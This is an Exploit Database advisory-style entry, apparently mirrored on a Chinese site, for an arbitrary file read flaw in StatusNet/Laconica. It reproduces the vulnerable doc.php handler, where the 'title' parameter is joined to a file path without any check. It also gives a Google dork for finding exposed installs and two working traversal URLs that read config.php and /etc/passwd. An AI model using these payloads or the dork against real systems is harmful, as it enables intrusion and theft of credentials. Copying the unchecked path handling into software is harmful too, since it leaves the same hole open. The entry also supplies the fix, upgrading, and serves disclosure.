StatusNet/Laconica 0.7.4/0.8.2/0.9.0beta3 – Arbitrary File Reading

• Exploit Database
• 79 阅读

• 作者： spiderboy
  日期： 2013-10-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/28956/

• +-------------------------------------------------------------------------------+
  + StatusNet/Laconica <= 0.7.4, <= 0.8.2, <= 0.9.0beta3 - arbitrary file reading +
  +-------------------------------------------------------------------------------+
  
  # Date:
  	- 10/10/2013
  
  # Exploit Author:
  	- spiderboy
  
  # Vendor Homepage:
  	- http://status.net/
  
  # Software Links:
  	- http://status.net/laconica-0.7.4.tar.gz
  	- http://status.net/statusnet-0.8.2.tar.gz
  	- http://status.net/statusnet-0.9.0beta3.tar.gz
  
  # Version:
  	- Branch 0.7.X : <= 0.7.4
  	- Branch 0.8.X : <= 0.8.2
  	- Branch 0.9.X : <= 0.9.0beta3
  
  # Tested on:
  	- Unix/Linux
  
  # Category:
  	- Webapps
  
  # Platform:
  	- php
  
  # Advisories :
  	- http://status.net/wiki/Security_alert_0000002
  	- http://osvdb.org/show/osvdb/95586
  
  # Google Dork:
  	- "It runs the StatusNet microblogging software, version 0.8.2"
  
  # Vendor product description:
  	- Free and Open Source social software
  
  # Vulnerable code:
  	- actions/doc.php:
  	--------------------------------------------------------------------
  	function handle($args)
  	{
  		parent::handle($args);
  		$this->title= $this->trimmed('title');
  		$this->filename = INSTALLDIR.'/doc-src/'.$this->title; //[1]
  		if (!file_exists($this->filename)) {
  			$this->clientError(_('No such document.'));
  			return;
  		}
  		$this->showPage();
  	}
  	--------------------------------------------------------------------
  	[1] : No check on user-supplied parameter $this->title
  
  # Proof of concept:
  	- http://[host]/index.php?action=doc&title=../config.php
  	- http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd
  
  # Solution:
  	- Upgrade to latest version : http://status.net/download